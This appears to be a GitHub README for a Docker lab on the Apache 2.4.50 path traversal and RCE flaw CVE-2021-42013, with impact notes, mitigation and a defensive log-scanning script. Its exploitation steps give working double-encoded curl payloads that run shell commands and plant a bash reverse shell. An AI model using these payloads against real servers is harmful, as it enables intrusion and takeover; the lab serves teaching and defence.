
CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (2.4.50)


CVE-2021-42013: Apache HTTP Server Path Traversal and Remote Code Execution Vulnerability

Overview

This repository provides information and resources related to CVE-2021-42013, a critical vulnerability in the Apache HTTP Server (version 2.4.50). The vulnerability allows path traversal and remote code execution (RCE) through a crafted URL path, enabling attackers to access and execute files outside the server's document root.

Details

  • CVE Identifier: CVE-2021-42013
  • Severity: Critical
  • Affected Versions: Apache HTTP Server 2.4.50
  • Fixed Version: Apache HTTP Server 2.4.51 or later

Description

CVE-2021-42013 is a vulnerability resulting from an incomplete fix for CVE-2021-41773. This flaw permits attackers to perform path traversal and potentially execute arbitrary code on the server. Exploitation of this vulnerability can lead to significant security breaches, including unauthorized access to sensitive data and full system compromise.

Impact

Successful exploitation of CVE-2021-42013 can result in:

  1. Unauthorized File Access: Attackers can access files outside the server’s document root, including sensitive system files, configuration files, and other protected resources. This could lead to the exposure of critical information, such as credentials, internal configurations, and other sensitive data.

  2. Remote Code Execution: By accessing and executing arbitrary files, attackers can potentially run malicious scripts or binaries on the server. This could allow them to take control of the server, install malware, create backdoors, and manipulate server operations.

  3. Service Disruption: Unauthorized access and execution of commands can disrupt normal server operations, leading to downtime, performance degradation, and denial of service (DoS) conditions. This impacts the availability and reliability of the services hosted on the server.

  4. Privilege Escalation: In cases where the server runs with elevated privileges, an attacker exploiting this vulnerability could gain administrative access, allowing them to perform further malicious activities and escalate their control over the server environment.

  5. Data Integrity Compromise: Attackers could modify or delete critical files, compromising the integrity of the data hosted on the server. This includes altering website content, defacing web pages, or tampering with application data.

Mitigation

To protect your server from CVE-2021-42013, it is crucial to:

  1. Update Apache HTTP Server: Upgrade to version 2.4.51 or later, where this vulnerability has been addressed.
  2. Restrict Access: Ensure proper server configuration to restrict access to only necessary files and directories, reducing the risk of path traversal attacks.
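The following is an added example, not part of this repository's code, showing why the fix in 2.4.50 was incomplete and how a defender can spot the pattern in access logs: a single round of percent-decoding catches the `%2e` form from CVE-2021-41773 but misses the double-encoded `%%32%65` form, while decoding until the path stops changing catches both. The log lines are constructed for the example; the decode-once function only approximates the 2.4.50 check and is not httpd's code.

```python
"""Flag double-URL-encoded path traversal (CVE-2021-42013 style) in Apache access logs."""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [07/Oct/2021:10:11:12 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.5 - - [07/Oct/2021:10:11:13 +0000] "GET /icons/.%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199
10.0.0.5 - - [07/Oct/2021:10:11:14 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 120
10.0.0.5 - - [07/Oct/2021:10:11:15 +0000] "GET /docs/a%2eb/page HTTP/1.1" 200 300
"""

# Pull the request path out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_once(path: str) -> str:
    """One round of percent-decoding (approximates the single-pass check of 2.4.50)."""
    return unquote(path)


def decode_fully(path: str, max_rounds: int = 5) -> str:
    """Decode until the string stops changing, so %%32%65 -> %2e -> '.' is fully unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def traversal_after_one_decode(path: str) -> bool:
    """The single-decode check: catches .%2e but misses .%%32%65 (the gap behind CVE-2021-42013)."""
    return any(seg == ".." for seg in decode_once(path).split("/"))


def has_traversal(path: str) -> bool:
    """True if any path segment is '..' after full decoding; the query string is ignored."""
    decoded = decode_fully(path.split("?", 1)[0])
    return any(seg == ".." for seg in decoded.split("/"))


def suspicious_requests(log_text: str) -> list[str]:
    """Return the raw request paths whose fully-decoded form climbs out of the document root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and has_traversal(m.group("path")):
            hits.append(m.group("path"))
    return hits
```

Note that a literal `a%2eb` segment is left alone: only a whole segment equal to `..` after decoding is reported, which keeps false positives down on ordinary encoded filenames.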

Simulation

Now, how about we do the simulation? Before we start, you need to have Docker Engine installed. The installation is pretty simple; just make sure you have Docker Engine ready on your computer. I will provide the link here. We use Docker for the lab so that our simulation of the exploitation runs in an isolated environment, in line with ethical hacking. Now, enough yapping, let's start!

Usage

  1. Clone this repository

Use the git command to clone the repository:

git clone https://github.com/rafifdna/CVE-2021-42013.git

Go to the repository directory:

cd CVE-2021-42013

  2. Prepare Lab

First, build the image from the Dockerfile with the command below:

docker build -t apache-lab .

Then, after the image is built, run it with the command below:

docker run -dit -p 888:80 apache-lab

  3. Verify Lab (Optional)

You can also check Docker to make sure the lab is running:

docker ps
docker logs <container-id>

Make sure the web server is running; you can curl it to see the output:

curl http://172.17.0.2:888

  4. Execution

Install the required libraries:

pip install -r requirements.txt

You can use the exploit.py script to check whether the target website is vulnerable before continuing to the execution step. The script covers both Path Traversal and Remote Code Execution (RCE).

python3 exploit.py -u http://172.17.0.2

Next, try the same check with curl:

curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; uname -a'
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; ls'

Exploitation

  1. Remote Code Execution

Using Reverse Shell With Netcat

curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "#!/bin/bash" > /tmp/lab.sh'
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; echo "bash -i >& /dev/tcp/127.0.0.1/221 0>&1" >> /tmp/lab.sh'
curl 'http://172.17.0.2:888/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; cat /tmp/lab.sh'

Using Metasploit

References

CVE-2021-42013 Details